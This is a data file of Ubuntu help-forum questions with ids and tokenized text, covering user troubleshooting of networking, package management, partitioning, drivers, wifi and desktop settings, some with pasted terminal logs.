429493	how to create a bookmark that opens a network shared folder	i am trying to create a bookmark that when i right click the files icon in the launcher and select the bookmark it will open the desire network shared folder . right now it only opens if i have previously opened the shared folder by going through the browse network option . what i want is to simply click the bookmark and this will open the network shared folder without the need for having it opened manually . the shared folder is through samba : smb : //client/stuff/ here is a screenshot of the bookmark to stuff : it will only work if i have previously opened the shared folder by going through the browse network option in the files app .
429494	how can i stream from computer through command line ?	i have several computers at home with webcams attached , and would like to stream from any one of them to my work computer . is there a way to do this in real time ? i can already take pics and record video through command line . is there a way to stream as well ?
429501	any big file download results in file error	my problem is that whenever i try downloading a big file ( 100mb or more ) , it always gets completed but file is corrupted . i have been observing this when downloading eclipse ide . i tried many eclipse versions , scala ide , but all result in the same error . is there something wrong with my internet connection or my hard drive ? how to diagnose and fix this problem ? *update * i tried using another computer to download the same file on the same internet connection . the file download is successful . so it means something wrong in my harddisk only . i checked the disk 'palimpsest ' report and does show many `` read errors '' and many `` seek errors '' , many `` hardware ecc recovered '' . but the `` uncorrectable sector count '' is 0 . does that mean my disk is a problem but it is a recoverable error ? what can be done to recover from these errors ? update 2 i tried attaching my phone as a usb device and downloaded the file in it . the file was downloaded using wget -c command . the same error occured , i.e . extracting the .tar.gz file failed as there was a crc error that means harddisk is ok , and internet connection is ok ( see update 1 ) , but there is something wrong in the os ? many times i am not even able to apply all updates as the updates also fail for the same reason `` hash sum mismatch '' plz help ! !
429503	gnome shortcuts does n't work	i installed gnome 3.10 on ubuntu 13.10 and ran my intellij idea , but the system shortcuts , like ctrl+c , ctrl+z , ctrl+v do not work there . it works well in google chrome . any ideas why this happens ?
429504	can anyone assess my g parted screen capture	can anyone explain to me what happened ? i have just installed ubuntu 13.10 and thought i was replacing windows . i have a backup but i 'm afraid to plug it in . i hope my d : drive with my data is untouched ... but i do n't know . note : i 'll try to attach two screen captures . one of the gparted data and another with a capture of my `` computer '' . i am interested in the initrd.img file .
429507	chromium adobe flash plugin	so i 've been running a windows 7 / ubuntu 12.04 lts dual boot for a while , and have been having a weird issue with the chromium adobe flash plug-in working for some youtube videos and not working for others . i 'd like to do a complete un-install and re-install of the plug-in to chromium , but i 'm not sure how to do that correctly . note that the plug-in works fine in firefox , so it 's no big deal , but it is something i would like to see get fixed . can someone please instruct me on how to un-install and re-install the chromium plug-in ? thanks , you all are the best !
429508	relinux - `` waiting for network configuration '' problem	i installed ubuntu 12.04 base system via the `` minimal ubuntu '' iso . i make a script to get hostname from dhcp server as explained here . it works perfect . i do n't install network manager because i dont need it . then i made an livecd.iso with relinux . it always shows `` waiting for network configuration '' and my script does n't work when boot with livecd.iso ( it shows same result with remastersys ) . i realize that it does n't give this waiting message if i install network manager . but at this time , my script stops again because network manager does n't hooks dhclient-exit-hooks.d . relinux also changes my /etc/network/interfaces . it adds `` eth1 '' , `` wlan '' etc . after some research , i use this solution to fix it but ubuntu starts without network configuration . how can i solve this problem ?
429510	are there any plans for releasing new interface for libreoffice ?	with all my respects , libreoffice seems to be a very old version of microsoft office . liberoffice team should work on it gui ( icons , appearance ) , so is there any plans to improve its appearance ? is there any enhancement i can download ? i like to see liberoffice charming and competing microsoft office .
429511	linux server uptime	i was wondering if there was a ( somewhat ) easy way to know when i can connect with putty after starting up the machine , since i will not have a monitor hooked up to it directly . i do n't really want to have to go through a bunch of trouble just to check if it 's ready . idk , since the server is hooked up to the same network as the computer i will be connecting with , maybe the server can send a dialog box saying ready ( or something ) ? i honestly have no idea , but that would be very awesome if i could get something like that to work
429512	dpkg or something related is corrupted ?	ubuntu version 10.04 lts i am having issues with package management system . i experienced a failed upgrade due to faulty ram . i have replaced the faulty ram but now having problems trying to install some packages . here is what i get with trying to install / reinstall samba , as an example : mleschishin @ borealis-ubuntu1 : ~ $ sudo apt-get -- reinstall install samba reading package lists ... done building dependency tree reading state information ... done suggested packages : smbldap-tools ldb-tools the following new packages will be installed : samba 0 upgraded , 1 newly installed , 0 to remove and 0 not upgraded . need to get 6,266kb of archives . after this operation , 17.1mb of additional disk space will be used . get:1 http : //ca.archive.ubuntu.com/ubuntu/ lucid-updates/main samba 2:3.4.7~dfsg-1ubuntu3.13 [ 6,266kb ] fetched 6,266kb in 19s ( 316kb/s ) use of uninitialized value $ template in exists at /usr/share/perl5/debconf/template.pm line 81 , < > line 1 . use of uninitialized value $ item in exists at /usr/share/perl5/debconf/dbdriver/cache.pm line 39 , < > line 1 . preconfiguring packages ... use of uninitialized value $ template in exists at /usr/share/perl5/debconf/template.pm line 81 , < gen1 > line 2 . use of uninitialized value $ item in exists at /usr/share/perl5/debconf/dbdriver/cache.pm line 39 , < gen1 > line 2 . use of uninitialized value $ template in exists at /usr/share/perl5/debconf/template.pm line 81 , < gen1 > line 3 . use of uninitialized value $ item in exists at /usr/share/perl5/debconf/dbdriver/cache.pm line 39 , < gen1 > line 3 . ca n't call method `` i18n '' on an undefined value at /usr/share/perl5/debconf/element/noninteractive/select.pm line 13 , < gen1 > line 3 . selecting previously deselected package samba . ( reading database ... 266813 files and directories currently installed . ) unpacking samba ( from ... /samba_2 % 3a3.4.7~dfsg-1ubuntu3.13_i386.deb ) ... processing triggers for ureadahead ... ureadahead will be reprofiled on next reboot processing triggers for ufw ... use of uninitialized value $ template in exists at /usr/share/perl5/debconf/template.pm line 81 . use of uninitialized value $ item in exists at /usr/share/perl5/debconf/dbdriver/cache.pm line 39 . use of uninitialized value $ template in exists at /usr/share/perl5/debconf/template.pm line 81 , < gen1 > line 4 . use of uninitialized value $ item in exists at /usr/share/perl5/debconf/dbdriver/cache.pm line 39 , < gen1 > line 4 . processing triggers for man-db ... use of uninitialized value $ template in exists at /usr/share/perl5/debconf/template.pm line 81 . use of uninitialized value $ item in exists at /usr/share/perl5/debconf/dbdriver/cache.pm line 39 . use of uninitialized value $ template in exists at /usr/share/perl5/debconf/template.pm line 81 , < gen1 > line 2 . use of uninitialized value $ item in exists at /usr/share/perl5/debconf/dbdriver/cache.pm line 39 , < gen1 > line 2 . use of uninitialized value $ template in exists at /usr/share/perl5/debconf/template.pm line 81 , < gen6 > line 2 . use of uninitialized value $ item in exists at /usr/share/perl5/debconf/dbdriver/cache.pm line 39 , < gen6 > line 2 . setting up samba ( 2:3.4.7~dfsg-1ubuntu3.13 ) ... use of uninitialized value $ template in exists at /usr/share/perl5/debconf/template.pm line 81 . use of uninitialized value $ item in exists at /usr/share/perl5/debconf/dbdriver/cache.pm line 39 . use of uninitialized value $ template in exists at /usr/share/perl5/debconf/template.pm line 81 , < gen1 > line 2 . use of uninitialized value $ item in exists at /usr/share/perl5/debconf/dbdriver/cache.pm line 39 , < gen1 > line 2 . use of uninitialized value $ template in exists at /usr/share/perl5/debconf/template.pm line 81 , < gen1 > line 3 . use of uninitialized value $ item in exists at /usr/share/perl5/debconf/dbdriver/cache.pm line 39 , < gen1 > line 3 . ca n't call method `` i18n '' on an undefined value at /usr/share/perl5/debconf/element/noninteractive/select.pm line 13 , < gen1 > line 3. dpkg : error processing samba ( -- configure ) : subprocess installed post-installation script returned error exit status 9 errors were encountered while processing : samba e : sub-process /usr/bin/dpkg returned an error code ( 1 ) this is what is reported when issuing sudo dpkg âaudit mleschishin @ borealis-ubuntu1 : ~ $ sudo dpkg -- audit the following packages are only half configured , probably due to problems configuring them the first time . the configuration should be retried using dpkg -- configure < package > or the configure menu option in dselect : samba smb/cifs file , print , and login server for unix and this is what 's reported when attempting to configure samba per the instructions : mleschishin @ borealis-ubuntu1 : ~ $ sudo dpkg -- configure samba setting up samba ( 2:3.4.7~dfsg-1ubuntu3.13 ) ... use of uninitialized value $ template in exists at /usr/share/perl5/debconf/template.pm line 81 . use of uninitialized value $ item in exists at /usr/share/perl5/debconf/dbdriver/cache.pm line 39 . use of uninitialized value $ template in exists at /usr/share/perl5/debconf/template.pm line 81 , < gen1 > line 2 . use of uninitialized value $ item in exists at /usr/share/perl5/debconf/dbdriver/cache.pm line 39 , < gen1 > line 2 . use of uninitialized value $ template in exists at /usr/share/perl5/debconf/template.pm line 81 , < gen1 > line 3 . use of uninitialized value $ item in exists at /usr/share/perl5/debconf/dbdriver/cache.pm line 39 , < gen1 > line 3 . ca n't call method `` i18n '' on an undefined value at /usr/share/perl5/debconf/element/noninteractive/select.pm line 13 , < gen1 > line 3. dpkg : error processing samba ( -- configure ) : subprocess installed post-installation script returned error exit status 9 errors were encountered while processing : samba i 've tried several commands to try to clean everything up ( clean/autoclean/remove/autoremove , etc . ) and fix any broken packages . synaptic does not report anything broken . this issue also appears to be preventing me from reconfiguring other packages ( like trying to reconfigure xserver-xorg ) . something else to note : i am encountering the same errors when installing acrobat reader . funny thing is that even though dpkg âaudit reports configuration problems , the acrobat reader application seems to work just fine . i 've looked around the forum and ca n't find a definitive solution to this problem . i 'd like to get this resolved before i attempt a full upgrade to 12.04 lts . can someone help ?
429514	unity is locked , you can not remove icons or move them	issue the following , i can not change the order of icons on the unity , nor their sleep or anything to add that it would be `` locked '' , the programs run .
429518	how do i get my mic working with streaming ?	i 'm able to stream from my computer and watch the stream on a local vlc using the following command : cvlc v4l2 : ///dev/video0 : v4l2-standard= : inputlave=alsa : //hw:0,0 : live-caching=300 : sout= '' # transcode { vcodec=wmv2 , vb=800 , scale=1 , acodec=wma2 , ab=128 , channels=2 , samplerate=44100 } : http { dst=:8080/stream.wmv } '' the problem is that i ca n't hear sound . the sound would come through my webcam . i 've done aplay -- list-devices but do not see my webcam ( usb ) there : michaeljwjr @ michaeljwjr-desk : ~ $ aplay -- list-devices **** list of playback hardware devices **** card 0 : mid [ hda intel mid ] , device 0 : alc889 analog [ alc889 analog ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : mid [ hda intel mid ] , device 1 : alc889 digital [ alc889 digital ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 2 : nvidia [ hda nvidia ] , device 3 : hdmi 0 [ hdmi 0 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 2 : nvidia [ hda nvidia ] , device 7 : hdmi 1 [ hdmi 1 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 2 : nvidia [ hda nvidia ] , device 8 : hdmi 2 [ hdmi 2 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 2 : nvidia [ hda nvidia ] , device 9 : hdmi 3 [ hdmi 3 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 however when i did lsusb i did see my webcam : bus 001 device 002 : id 045e:0766 microsoft corp. lifecam vx-800
429521	how do i reformat hdd to ntfs with ubuntu on a bootable usb	so i need to install windows on my hard drive and i 'm trying to use ubuntu to reformat the hdd to ntfs . these are the steps i will take : create a bootable usb with ubuntu boot from usb ? ? ? remove usb , now boot with my windows install disc . the third step is where i 'm confused . once i boot from usb , how do i make the hdd into ntfs ? i did a google search and i 'm pretty confused with the results . i really do n't want to mess up the hdd . what do i do after ?
429522	refuses to boot because of checksum error	i have windows xp on a dell d820 laptop . it no longer boots and i get a checksum error . tried to boot ubuntu from a pen drive . i got a new screen but it vanished quickly and the checksum error came back . will a new hard drive help , or is there another way ?
429524	how to reboot after security update interruption ?	my computer is a hp compaq with pentium 4 ii . during an ubuntu security update it said 7 hours left . i unplugged the computer , thus earning my doom . is there anyway to reboot ?
429529	can i upgrade ubuntu without losing my apps and files ?	i was just wondering since i have the 12.04 lts ubuntu edition if it 's possible to upgrade it to 13.04 or even 14.04 after it gets released without losing any of my files and installed apps ? that 's actually the main reason i chose the lts version because i did n't know if i had to re-install all my apps every time a new ubuntu version gets released .
429531	installing ubuntu on a flash drive	i would like to install ubuntu on a flash drive so i can carry my computer with me in my pocket . i have already tried making live bootable drive , but that is n't persistent . how can i install ubuntu on a flash drive just and run it just like it is installed on a hard drive , so all my files and settings are saved from session to session ? thanks !
429533	partition scheme questions in dual boot ubuntu/windows installation	i just got a new laptop with windows 8 and i am ready to install ubuntu . i see the hard drive already has quite a few partitions , most of which seem related to windows recovery . see capture : i am not allowed to post images , so i am including a link to the capture instead . partitions on my computer i think i should probably avoid touching those partitions , if i want to keep the factory system recovery options . any comments on this ? i see there is a partition marked as active & boot , a 300 mb fat32 partition with type efi system partition . is anyone familiar with this type of partition ? when installing ubuntu should i somehow use this partition for grub or something like that ? if so , how would i do that ? the disk has 1000gb . i am thinking i would like to : resize the main partition ( acer/ntfs ) with windows . not sure what the minimum size should be . is 80gb ok ? too small ? too large ? use the freed up space to create the rest of partitions ... but i think i will need to create an extended partition , because there are already too many partitions , am i right ? create a windows data partition ( ntfs ) with maybe 200-300 gb create an ubuntu os partition . ext4 ok ? or is there a better filesystem for the os ? what about size ? maybe 50 gb ? 100 gb ? create a swap partition , maybe 16gb because that 's the maximum ram allowed in the system . or maybe i can set it to exactly 8gb as the current size of ram and resize later if needed ? create a data partition for /home , with the remaining space ( probably around 500-600 gb ) . now , i am thinking i would like the /home partition to be visible to windows . to do so i believe i would need to use ntfs as filesystem for that partition . does this make sense at all ? maybe ubuntu is more comfortable ( faster access , etc ) with ext4 or other linux filesystem and i would sacrificing performance ? if a linux filesystem should be used is ext4 the best or other ?
429537	usb mouse stops working after resume - ubuntu 13 . macbook pro 8,2	if the laptop boots up for the first time my xenta wireless mouse works great . after sleep / resume , it will continue to work for maybe a few minutes before stopping completely . lsusb bus 001 device 011 : id 1d57:001d xenta while xinput -- list shows ⎡ virtual core pointer id=2 [ master pointer ( 3 ) ] ... ⎜ ↳ hid compliant-mouse hid compliant-mouse id=12 [ slave pointer ( 2 ) ] ... any time the mouse is plugged in , whether it 's frozen or not . i can fix it ( very ) temporarily by unplugging the usb receiver and plugging back in . after about one minute , it freezes again . it 's only really fixed by restarting . this mouse works on this laptop fine in my os x and windows partitions , including after sleep / resume . any help would be much appreciated - i use ubuntu on this macbook way more than i use os x or windows and really would like this mouse to work fine with it as well .
429539	no wifi connection dell5420 on ubuntu	can anyone tell me if the wireless driver problem with dell inspiron 5420 is solved or not ? few months ago i have tried all the process i can find but nothing worked for me.now if someone can tell me for sure then i will try again to switch to ubuntu . thanks in advance .
429540	wifi suddenly stops connecting ?	i 'm dual-booting windows 8 and ubuntu 13.10 , and one day ubuntu stopped being able to connect to wireless . it still sees the network , it just ca n't connect to it . i do n't have a wired connection available , so i ca n't run aptitude update or upgrade . i do n't know a lot about connectivity troubleshooting , but when i did iwconfig , it said `` no network connections '' under wireless . i 'm on windows now to type this , so i do n't have the exact wording . windows 8 has the weird uefi thing , otherwise i would do my old trick of reinstalling ubuntu all over again . but that 's probably not the best thing to do . any help ? edit : laura @ bbydhyonchord : ~ $ dmesg | tail -n 50 [ 56.948484 ] iwlwifi 0000:01:00.0 : fh trbs ( 3 ) = 0x80300002 [ 56.948497 ] iwlwifi 0000:01:00.0 : fh trbs ( 4 ) = 0x00000000 [ 56.948511 ] iwlwifi 0000:01:00.0 : fh trbs ( 5 ) = 0x00000000 [ 56.948524 ] iwlwifi 0000:01:00.0 : fh trbs ( 6 ) = 0x00000000 [ 56.948538 ] iwlwifi 0000:01:00.0 : fh trbs ( 7 ) = 0x00709041 [ 56.948592 ] iwlwifi 0000:01:00.0 : q 0 is active and mapped to fifo 3 ra_tid 0x0000 [ 2,3 ] [ 56.948648 ] iwlwifi 0000:01:00.0 : q 1 is active and mapped to fifo 2 ra_tid 0x0000 [ 0,0 ] [ 56.948703 ] iwlwifi 0000:01:00.0 : q 2 is active and mapped to fifo 1 ra_tid 0x0000 [ 0,30 ] [ 56.948758 ] iwlwifi 0000:01:00.0 : q 3 is active and mapped to fifo 0 ra_tid 0x0000 [ 0,0 ] [ 56.948814 ] iwlwifi 0000:01:00.0 : q 4 is active and mapped to fifo 0 ra_tid 0x0000 [ 0,0 ] [ 56.948869 ] iwlwifi 0000:01:00.0 : q 5 is active and mapped to fifo 4 ra_tid 0x0000 [ 0,0 ] [ 56.948925 ] iwlwifi 0000:01:00.0 : q 6 is active and mapped to fifo 2 ra_tid 0x0000 [ 0,0 ] [ 56.948980 ] iwlwifi 0000:01:00.0 : q 7 is active and mapped to fifo 5 ra_tid 0x0000 [ 0,0 ] [ 56.949035 ] iwlwifi 0000:01:00.0 : q 8 is active and mapped to fifo 4 ra_tid 0x0000 [ 0,0 ] [ 56.949090 ] iwlwifi 0000:01:00.0 : q 9 is active and mapped to fifo 7 ra_tid 0x0000 [ 66,66 ] [ 56.949146 ] iwlwifi 0000:01:00.0 : q 10 is active and mapped to fifo 5 ra_tid 0x0000 [ 0,0 ] [ 56.949201 ] iwlwifi 0000:01:00.0 : q 11 is inactive and mapped to fifo 0 ra_tid 0x0000 [ 0,0 ] [ 56.949256 ] iwlwifi 0000:01:00.0 : q 12 is inactive and mapped to fifo 0 ra_tid 0x0000 [ 0,0 ] [ 56.949312 ] iwlwifi 0000:01:00.0 : q 13 is inactive and mapped to fifo 0 ra_tid 0x0000 [ 0,0 ] [ 56.949367 ] iwlwifi 0000:01:00.0 : q 14 is inactive and mapped to fifo 0 ra_tid 0x0000 [ 0,0 ] [ 56.949422 ] iwlwifi 0000:01:00.0 : q 15 is inactive and mapped to fifo 0 ra_tid 0x0000 [ 0,0 ] [ 56.949478 ] iwlwifi 0000:01:00.0 : q 16 is inactive and mapped to fifo 0 ra_tid 0x0000 [ 0,0 ] [ 56.949533 ] iwlwifi 0000:01:00.0 : q 17 is inactive and mapped to fifo 0 ra_tid 0x0000 [ 0,0 ] [ 56.949588 ] iwlwifi 0000:01:00.0 : q 18 is inactive and mapped to fifo 0 ra_tid 0x0000 [ 0,0 ] [ 56.949644 ] iwlwifi 0000:01:00.0 : q 19 is inactive and mapped to fifo 0 ra_tid 0x0000 [ 0,0 ] [ 56.975498 ] cfg80211 : calling crda to update world regulatory domain [ 56.977687 ] cfg80211 : world regulatory domain updated : [ 56.977689 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) [ 56.977691 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 56.977692 ] cfg80211 : ( 2457000 khz - 2482000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 56.977693 ] cfg80211 : ( 2474000 khz - 2494000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) [ 56.977694 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 56.977695 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 57.168191 ] wlan0 : authenticate with 00:19:77:44 : a6:94 [ 57.173685 ] wlan0 : send auth to 00:19:77:44 : a6:94 ( try 1/3 ) [ 57.175275 ] wlan0 : authenticated [ 57.175350 ] wlan0 : waiting for beacon from 00:19:77:44 : a6:94 [ 57.212574 ] wlan0 : associate with 00:19:77:44 : a6:94 ( try 1/3 ) [ 57.214526 ] wlan0 : rx assocresp from 00:19:77:44 : a6:94 ( capab=0x421 status=0 aid=1 ) [ 57.233990 ] wlan0 : associated [ 57.234033 ] cfg80211 : calling crda for country : us [ 57.235870 ] cfg80211 : regulatory domain changed to country : us [ 57.235872 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) [ 57.235874 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2700 mbm ) [ 57.235875 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 1700 mbm ) [ 57.235875 ] cfg80211 : ( 5250000 khz - 5330000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 57.235876 ] cfg80211 : ( 5490000 khz - 5600000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 57.235877 ] cfg80211 : ( 5650000 khz - 5710000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 57.235878 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 3000 mbm ) [ 57.235878 ] cfg80211 : ( 57240000 khz - 63720000 khz @ 2160000 khz ) , ( n/a , 4000 mbm ) laura @ bbydhyonchord : ~ $ nmcli -p d =========================================== status of devices =========================================== device type state -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - eth0 802-3-ethernet unavailable wlan0 802-11-wireless connecting ( getting ip configuration ) laura @ bbydhyonchord : ~ $ iwconfig eth0 no wireless extensions . lo no wireless extensions . wlan0 ieee 802.11bgn essid : '' w-m_wireless '' mode : managed frequency:2.437 ghz access point : 00:19:77:44 : a6:94 bit rate=11 mb/s tx-power=16 dbm retry long limit:7 rts thr : off fragment thr : off power management : off link quality=39/70 signal level=-71 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:0 invalid misc:0 missed beacon:0
429541	why are my juju relation hooks not running ?	i 'm trying to create a charm that can connect to rabbitmq . i 've written an amqp-relation-joined , and an amqp-relation-changed . neither of these scripts executes when i run juju add-relation $ mycharm rabbitmq-server . in the logs , i 'm seeing ... == > < $ home > /.juju/local/log/unit-rabbitmq-server-0.log < == 2014-03-04 20:43:48 debug juju.worker.uniter.filter filter.go:523 no new charm event 2014-03-04 20:43:48 debug juju.worker.uniter.filter filter.go:338 got relations change == > < $ home > /.juju/local/log/unit-flask-0.log < == 2014-03-04 20:43:48 debug juju.worker.uniter.filter filter.go:523 no new charm event 2014-03-04 20:43:48 debug juju.worker.uniter.filter filter.go:338 got relations ... i expect to see some sort of output from my hooks because i 'm logging stuff . in amqp-relation-joined : echo `` doing amqp stuff '' juju-log `` $ juju_remote_unit modified its settings '' juju-log `` relation settings : '' relation-get juju-log `` relation members : '' relation-list touch /var/i_was_here in amqp-relation-changed : echo `` doing amqp stuff '' juju-log `` $ juju_remote_unit modified its settings '' juju-log `` relation settings : '' relation-get juju-log `` relation members : '' relation-list touch /var/i_was_also_here when i ssh into the machine , i am not seeing either /var/i_was_here or /var/i_was_also_here i am running juju on ubuntu 12.04 in local mode . edit : the metadata.yml is name : flask summary : flask is a lightweight `` microframework '' that is often used for simple apis maintainer : ubuntu < ubuntu @ ip-172-31-24-81.us-west-2.compute.internal > description : | ... categories : - misc subordinate : false provides : api : interface : http requires : amqp : interface : rabbitmq the charms that i 'm using are rolled into a single repository at https : //github.com/peterklipfel/firesuit/tree/master/charms
429543	dell optiplex 745 powers off after komodo download	i am running ubuntu 12.04 64 bit on an optiplex 745 core2duo dual 2.3 ghz with 4 gigs installed plus an ati radeon 5450 1 gig video card for several months now , no problems at all . my dell 5150 windows7 laptop rejected the wireless mouse , long story short virus . thought it might be a downloaded movie disc ( which i burned on the linux machine ) so to eliminate it , i thought i would download komodo for linux , update and pop in the disc and run komodo to see if it was the disc . came back from store and machine shut off . started it up , came up to background screen saver , but would not load ( very similar problem on windows machine ) it gave three buzzes/beeps and went black screen . had difficulty getting disc out , but succeeded . now when powering up , all i get is the three beeps/buzzes and black screen . took side panel off and a little yellow light labeled secondary power located next to the old floppy drive cable connection spot is on ... ... that 's all folks ! any suggestions as to what might have happened or what steps to take please ? sincerely , buzzed in fla ... .
429546	will ubuntu phone support features like on the yotaphone ?	i am really interested in ubuntu phone . my question is , will ubuntu phone support features like that from the yotaphone , such as the double display , or the e-ink display on the back ?
429550	domain pointed to my server but i get an error when applying changes , please help	i have a domain pointing to it using a record on name cheap and i have created a virtual host on webmin . but it is not working as i think i need to restart the apache web server , or apply changes i 'm not sure ? i get this error when i press apply changes : failed to apply changes : apache2 : syntax error on line 237 of /etc/apache2/apache2.conf : syntax error on line 3 of /etc/apache2/sites-enabled/default-ssl : without matching section action 'configtest ' failed . the apache error log may have more information . but i have no idea , i need to get this working as soon a possible , really grateful for any help
429553	login issues on ubuntu 12.04	whenever i put in my password , it cuts to a few lines of code then returns to the login . i 've tried edm and lightdm , nothing works .
429555	is it possible to run phoronix-test-suite in ubuntu server 12.04 lts and also run nmon at the same time in the background	i was thinking since phoronix-test-suite will kind of stress test ubuntu server , may be it also possible to run nmon in the background to view for later analysis .
429556	can i install unity on gnome 3 ?	i am running ubuntu gnome 3.10 , can i install unity on gnome , or will it break gnome ? or should i do a fresh install ? thanks
429557	about promoting local floss products and ubuntu	does ubuntu have representatives/ambassadors just like fedora ambassadors , because i am really hyped to promote ubuntu and its products in various events related to open source , in my local community . i would like every piece of info regarding this matter thank in advance
429560	i ca n't upgrade from 12.10 to 13.04 or 13.10 . my updater does not give me an option to upgrade to 13.04	i keep getting an error message when i try to upgrade to 13.10 . i have made sure that 12.10 is up-to-date and when i did all my updates , i was asked if i wanted to upgrade to 13.10 , not 13.04 . when i hit upgrade , the upgrade starts , but then i get an error message . help !
429562	windows 7 is not installing with usb drive	can not install windows 7 from usb drive . since i do n't have a dvd/cd-rom i am habituated to install os and sofware from usb but after installing ubuntu 12.04 i wanted to make my system dual boot so i want to remove ubuntu and install windows 7 then install ubuntu but whenever i try to boot from my usb either it gives me a black screen with a blinking cursor or it gives me a message grub unknown file system
429568	how can i use two different icon sets at same in kde 4.x ?	i 'm on kubuntu 12.4 , and i want to use tux 'n tosh for places and devices , and reflektions for renmant system . how do i that ? thanks in advice . ( and sorry for the bad english , i 'm from brazil )
429571	is it possible to clone an ubuntu partition to an iso ?	i need to copy my hard disk into an iso which i can then turn into an ubuntu live cd . is it possible to make an ubuntu iso from my hard disk ? if so , how would i do this ? thanks .
429575	is it possible to run ubuntu with an amd e1 2500 with a radeon 8240 ?	when i install the 64 bit version of ubuntu 12.04 i get the error where it says i must run in low graphics mode . how can i resolve this ? the install seemed to run fine i.e . no problems graphically .
429576	increase ubuntu partition size under virtual machine	i use macbook with mac os x 10.9.1 . i have installed vmware fusion 6.0.2 , under which ubuntu 12.04 lts has been installed as virtual machine . now i need to increase the size of the disk of ubuntu . gparted shows that there is 80g unallocated : however , right-clicking on the first partition shows that resize/move is gray , then i do n't know how to continue ... ps : this post seems to have same problem as i . if so , could anyone tell me how to boot from the ubuntu livecd under vmware fusion ? edit1 : i have set up the following in vmware to try to boot from the ubuntu livecd : once started , it is odd that i did n't see anything different from a boot from hard disk ... still , i opened terminal , turned swap off , and launched gparted . in gparted , i deleted the swap ( as well as the whole extended partition containing it ) . however , i could not resize/move /dev/sda1 . could anyone help ? edit2 : following the comment of @ hadi , i think creating another disk is not a bad idea , a disk usage analysis shows the follows . could anyone suggest which of my folders should be mounted to a newly created disk ?
429578	how do you know if you can add 64 bit version of lubuntu ?	noob alert- i have an hp/compaq nc6120 laptop . i just added the 32 bit version of lubuntu , however i wondered what would tell me if i could use the 64 bit version ? here are my pc specs computer : processor : intel ( r ) pentium ( r ) m processor 1.86ghz memory : 2056mb ( 441mb used ) operating system : ubuntu 13.10 display : resolution : 1400x1050 pixels i understand that pcs older than 2007 do not likely use 64 bit , but i 'm not sure how old this laptop is . thanks for your help mike
429582	how to uninstall amd drivers so i can switch video cards ?	i 'm switching video cards from amd radeon to a nvidia geforce how do i remove the amd drivers ? also do i remove drivers then swap out graphic cards or switch graphic cards first ? i 'm using 12.04 any help is appreciated
429584	slow internet connection	i have a d-link dwl-g122 b1 wireless adapter with chipset rt2571 , which corresponds to rt2500 driver in linux . however , because this specific driver is no longer available for my kernel version ( 3.11 ) , i had to use a windows driver using ndiswrapper . i can get an internet connection but my wifi signal is weak and sometimes the connection drops . what should i do to improve my adapter performance in order to keep a good and stable connection ? should i use another linux driver compatible with this adapter , perhaps rt73 ? change some configurations ? change to a new and better adapter ?
429587	restore shutdown button on taskbar ? how do you restore desktop taskbar in lubuntu ?	is n't there a way to go back to a default setting for the desktop ? an original configuration ? how about restoring the shutdown/logoff button in the panel/taskbar ? just installed lubuntu ( ubuntu 13.10 ) and got to playing around with the settings . unfortunately , i took some things out and moved things around that now that i look at it i really do n't like . how do i get back to square one , the way the desktop task bar looked like when i first installed it ? example i lost the `` start '' like area in the left . the 3 icons to the right of that and now do n't have he power button which was all the way to the right where the clock is . i do n't really want to re-install os all over again , because i do want to keep some customizations that i have done .
429589	ubuntu mobile device compatibility	will netbooks running an intel atom cpu and no touchscreen be able to run ubuntu-phone ? the computer can run 12.04.i want to debug a app that will run on ubuntu-phone .
429590	what are the advantages/disadvantages of the new encryption feature in ubuntu 13.10	i 'm in the middle of installing 13.10 and the ubuntu page i was following on how to install from a usb stick says nothing about these two choices ( on the installation type screen ) : 1 ) encrypt the new ubuntu installation for security ( you will choose a security key in the next step ) . 2 ) use lvm with the new ubuntu installation ( this will set up logical volume management . it allows taking snapshots and easier partition resizing ) i 'm a writer using the computer for mostly writing ebooks but i also do all the things most people do : buy stuff online , online banking etc . i want my information to be safe but i do n't want to overburden my system with security stuff either . and i 've read a lot of the similarly themed questions here on the forum but they 've all been about stuff more technical than i 'm concerned about . can somebody please just tell me in real layman 's terms about the implications of these two choices ? thank you .
429592	what is the purpose of /etc/default ?	i 've assumed /etc/default was a handy place to save the post-install/default state of configuration files so that when some poor sysadmin arrives at a new system she can quickly determine what has been customised on that instance . but having just had a look around in there it seems i am mistaken ? so apologies if this is a dumb question ... what 's supposed to be in the /etc/default directory ? where would it be appropriate , or is there a convention , for saving the default state of config files ?
